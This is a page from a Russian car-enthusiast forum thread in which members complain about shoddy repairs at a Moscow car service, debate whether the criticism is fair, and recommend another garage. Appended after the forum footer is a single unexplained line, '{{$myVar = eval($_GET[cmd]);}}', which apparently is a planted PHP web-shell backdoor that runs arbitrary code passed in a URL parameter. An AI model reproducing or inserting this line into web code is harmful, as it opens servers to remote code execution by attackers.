+ Ответить в теме
Страница 3 из 5 ПерваяПервая 1 2 3 4 5 ПоследняяПоследняя
Показано с 21 по 30 из 49

Тема: отзыв о сервисе


  1. #21
    <div class='quotetop'>Цитата(MORG m&#045;customs &#064; Jul 5 2007, 16&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>Ну конечно они могут себе это позволить&#33; Я когда перебирал свою КПП привёз 2 коробки на разбор&#33; Когда я уезжал - коробочки оставил в им подарок со всеми потрохаки, думаю многие тоже так делают, хотя на ценники это не влияет, на отношение... может быть... Очень жалею что большому количеству народа посоветовал этот сервис. Контора начинает загнивать не как рыба с головы а с ласт. Олег с Никитой конечно хорошие, умные и толковые, но контингент непосредственно выполняющий работы набирается уже чуть ли не из молдавии и таджикистана, что естественно влияет на качество работ. Косяки не устраняются а либо камуфлируются либо откашивается лиш бы не решать проблем (&#33;&#33;&#33;).
    Что самое печальное именно когда ремонтировали коробку и помяли мне крыло переднее, что повлекло бесплатную установку КПП и понятное дело первые негативы ко мне как к клиенту требовательному.

    Я хочу предостеречь всех кто обслуживается в данном сервисе исходя из персонального отношения ко мне - если Вам что-либо помнут из кузовщины, сделают некачественно или попортят что-либо - исправления полученного ущерба Вы не дождётесь. Либо будет откос либо будет косяк устранён так что это ещё больше навредит автомобилю вцелом. Регламента сдачи автомобиля в сервис не существует (бумажечка такая с кузовом в развёрнутом виде где отмечаются ваши кузовные косячки) - посему всё что с машиной случается на их территории в отсутствии Вас - за Ваш же счет.

    Каждый божий день ремонтируя свой автомобиль я нахожу всё больше косяков оставленных мне в память о гольфстриме. Например заглушка колёсного диска (пыльник ступицы так сказать) - красивая эмблемка там и всё такое... Ну потеряли в гольфстриме, ну с кем не бывает, но при предъявлении претензии разводят руками мол так и было, и то что именно это колесо снималось для проведения ремонта уже не аргумент и то что эта заглушка - оригинал от BBS, который можно купить только комплектом за 1400 рублей это уже ни кого не ебёт - отремонтировался на 600 рублей, попал на 1400.... весело... заказ на заглушки 3 месяца... ещё веселей... кому они зимой то нужны на другом литье то...
    Хорошо хоть инструмент под капотом иногда забывают, у кого-то будет шанс обоготиться за этот счёт... Мне же неприятно что удлиннитель от кинг-тони поебашил мне крылья изнутри катаясь по отливу влево-вправо на поворотах&#33; Хотите сказать что нефига закладывать в повороты? Нефига ключи под капотом мне забывать&#33; Я человек нормальный, поддерживаю нормальные отношения не ругаясь&#33; Народу не распространяюсь&#33; Все забытые ключи не к себе в гараж складываю а в сервисы отдаю, пока они не наносят ущерб моему авто и лично моей нервной - системе слушать металлические наебки в повороте&#33;
    Ещё мачить? Мачу&#33; Я согласен с "кастомом" и всевозможными "поделками" , но не согласен когда они делаются на уровне ТРАКТОРИСТИКИ&#33; Пылезащиту снизу прикрутить - да&#33; Просьба есть&#33; Да я попал в яму и приехал как следствие менять прокладку поддона картера&#33; Да я обратился и мне не отказали записав меня на следующий день а не через неделю как обычно&#33; Но нахуя же прикручивать защиту на пробки от бутылок&#33; Ведь сервис же&#33; МОжно найти и шайбы и гроверы млять&#33; И не надо мне доказывать что так надёжнее и сподручнее - приебашить саморезом через пробку от бутылки&#33; Не надо&#33;
    Ещё мачить? Сколько делали соседу моему на старой ауди диагностику впрыска и зажигания? 2 месяца&#33; После ремонта в гольфстриме машина перестала держать холостой ход&#33; До ремонта холостой ход был нормальный&#33; Косяк? Косяк&#33; Но косяки устраняются как? Правильно&#33; Исключительно на глубоком досуге&#33; При звонках в сервис были достойные ответы - машиной сейчас ни кто не занимается потому что все заняты? А ремонтировать и брать деньги - все были свободны. Как только возникает косяк все сразу становятся резко заняты и цены возрастают до уровня ВЫШЕ ОФИЦИАЛОВ&#33; Персональные ценнички чуваку на старой машинке.... даужж....
    Ещё мачить? Почитайте отзывы и вопросы которые возникают в разделе "общение" на их официальном сайте&#33; Там регулярно подтираются обращения, но пока их сотрут есть возможность почитать&#33; Людям делают машины по пол года, хотя как я понял клиенты кредитоспособны и ждут... просто могут ждать.... почитайте...
    Ещё мачить?[/b][/quote]
    Хренасе ты выдал... зачетно размазал :-)))

  2. #22
    GTI-Racing MORG m-customs is on a distinguished road Аватар для MORG m-customs
    Регистрация
    26.06.2006
    Машина
    Impreza WRX
    Сообщений
    2,081
    <div class='quotetop'>Цитата(MORG m&#045;customs &#064; Jul 10 2007, 17&#58;40) <{POST_SNAPBACK}></div><div class='quotemain'>Ап[/b][/quote]

    АП&#33;&#33;&#33; ЭТО ВСЕГДА БУДЕТ НАВЕРХУ КАК Я ВОШЕЛ В ФОРУМ&#33;&#33;&#33;
    НАРОД&#33;&#33;&#33; ТРЕБУЙТЕ ЧТОБЫ РЕАЛЬНЫЕ МАСТЕРА ГОЛЬФСТРИМА РАБОТАЛИ С ВАШЕЙ МАШИНОЙ РУКАМИ А НЕ ЯЗЫКАМИ С ВАШИМИ УШАМИ&#33;&#33;&#33;
    ИЗ СВЕЖЕГО - НА ПОДДОНЕ КАРТЕРА ОТСУТСТВОВАЛИ 5 БОЛТОВ, Я МЕНЯЛ ПРОКЛАДКУ ПОДДОНА В ГОЛЬФСТРИМЕ ВЕСНОЙ&#33; ОПЯТЬ ПОПАЛ НА РАБОТУ, СМЕНУ МАСЛА И ДОРОГОСТОЯЩУЮ ПРОКЛАДКУ&#33; ЗАДОЛБАЛО&#33;&#33;&#33;

  3. #23
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    писец&#33; а ведь раньше сам его рекомендовал)

  4. #24
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    А мне понравился сервис на Дмитровке Астор транс называется http://astortrans.ru/index2.php
    Так вот там отличный диагност Володя Малахов, цены оч даже не дорогие проверит все параметры и в итоге найдет причину поломки делал там пару раз остался доволен.
    Вот аська его 322-646-316 erektrik
    BMW 330D POWERED by Dizelboost :pepper:

  5. #25
    GTI-Racing MORG m-customs is on a distinguished road Аватар для MORG m-customs
    Регистрация
    26.06.2006
    Машина
    Impreza WRX
    Сообщений
    2,081
    <div class='quotetop'>Цитата(magnum126 &#064; Jul 12 2007, 00&#58;28) <{POST_SNAPBACK}></div><div class='quotemain'>писец&#33; а ведь раньше сам его рекомендовал)[/b][/quote]

    Очень извиняюсь Максим. Раньше не вылазило, машина не продержалась больше года обслуживания...
    Отсутствие болтов на поддоне картера ваще вышибло меня позавчера&#33; Это не просто невезение&#33;

  6. #26
    GTI-Racing DUX is on a distinguished road Аватар для DUX
    Регистрация
    16.12.2006
    Откуда
    ВАО
    Машина
    VW .. 3.0 tdi
    Сообщений
    2,255
    <div class='quotetop'>Цитата(MORG m&#045;customs &#064; Jul 12 2007, 16&#58;49) <{POST_SNAPBACK}></div><div class='quotemain'>Очень извиняюсь Максим. Раньше не вылазило, машина не продержалась больше года обслуживания...
    Отсутствие болтов на поддоне картера ваще вышибло меня позавчера&#33; Это не просто невезение&#33;[/b][/quote]
    а может это из-за качества дорог они повылетали, а в Гольф... их просто плохо протянули?&#33;
    :rolleyes:
    Если вдруг стало темно, не пугайтесь - вы обогнали свет.

  7. #27
    морг угомонись, ну написал так написал, зачем так бесится, мне например в гольфстриме очень понравилось, выставляли там зажигание, еще Олег давал нам так сказать мастер класс по разборе коробасов и тд. у всех бывают косяки , только кто то старается их исправить а у кого то это на потоке, вот ився разница. я не буду ни с кем спорить просто у каждого все равно останется свое мнение

  8. #28
    GTI-Racing MORG m-customs is on a distinguished road Аватар для MORG m-customs
    Регистрация
    26.06.2006
    Машина
    Impreza WRX
    Сообщений
    2,081
    <div class='quotetop'>Цитата(Vint &#064; Jul 14 2007, 16&#58;34) <{POST_SNAPBACK}></div><div class='quotemain'>морг угомонись, ну написал так написал, зачем так бесится, мне например в гольфстриме очень понравилось, выставляли там зажигание, еще Олег давал нам так сказать мастер класс по разборе коробасов и тд. у всех бывают косяки , только кто то старается их исправить а у кого то это на потоке, вот ився разница. я не буду ни с кем спорить просто у каждого все равно останется свое мнение[/b][/quote]

    А что делать когда сервисы отказываются исправлять косяки? Чиниться по-новой? Автомобиль в обслуживании становится как мерседес S-класса вообщето с такими то косяками&#33;
    Я не угомонюсь пока не перечислю всё полностью - в связи со специальной политикой ценообразования сервиса в мою сторону под конец сотрудничества&#33;&#33;&#33;
    В другой ветке идёт полный перечень с которым ты можеш ознакомиться с нововыявленными косяками&#33;
    Мне ценники писать на которые я попадаю или как - чтобы было более ясно из-за чего всё это???
    Сервис не пойдёт на устранение таких дорогостоящих косяков - им исключительно срать на клиентов народе меня ибо найдётся огромная масса людей на стареньких авто под ремонт которым всё равно мнение сервисов - им главное чтобы их авто ещё передвигался.
    Я считаю глубоким падением сервиса в связи с ориентированием на данный контингент.

  9. #29
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(Vint &#064; Jul 14 2007, 16&#58;34) <{POST_SNAPBACK}></div><div class='quotemain'>морг угомонись, ну написал так написал, зачем так бесится, мне например в гольфстриме очень понравилось, выставляли там зажигание, еще Олег давал нам так сказать мастер класс по разборе коробасов и тд. у всех бывают косяки , только кто то старается их исправить а у кого то это на потоке, вот ився разница. я не буду ни с кем спорить просто у каждого все равно останется свое мнение[/b][/quote]

    Хорошо сравнил "выставляли зажигание" и работы у Морга которые не каждый ваще когда либо будет делать. Что еще остается писать тебе что они не умеют выставлять зажигание? это было бы уже перебор, если б они это не умели. Вопрос чаще всего к подмастерьям которые колбасят машину, пока настоящие хозяева-мастера заняты другим делом, и потом не хотят отвечать за них.
    песок сыпется....не останавливайтесь на достигнутом !

  10. #30
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    2Bon +1&#33;
    моргу сочувствую((
    и думаю что стоит преслушиться к его критики&#33; так как умный учиться на чужих ошибках&#33; так давайте небудит падать 2 раза в одну и туже яму&#33;
    Морг молодец&#33;&#33;&#33;&#33;&#33;

+ Ответить в теме
Страница 3 из 5 ПерваяПервая 1 2 3 4 5 ПоследняяПоследняя

Похожие темы

  1. Первый Отзыв О Caliber Srt-4
    от nickart в разделе Курилка
    Ответов: 4
    Последнее сообщение: 05.07.2008, 14:14
  2. отзыв о чипе от s-chipa
    от biscuit в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 164
    Последнее сообщение: 07.11.2007, 16:02
  3. Личный Отзыв
    от MORG m-customs в разделе Курилка
    Ответов: 47
    Последнее сообщение: 30.10.2007, 00:49
  4. Отзыв о Гольф5 1,6+ вопрос.
    от GrooveNK в разделе Отзывы / Выбор
    Ответов: 3
    Последнее сообщение: 01.12.2006, 09:56

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}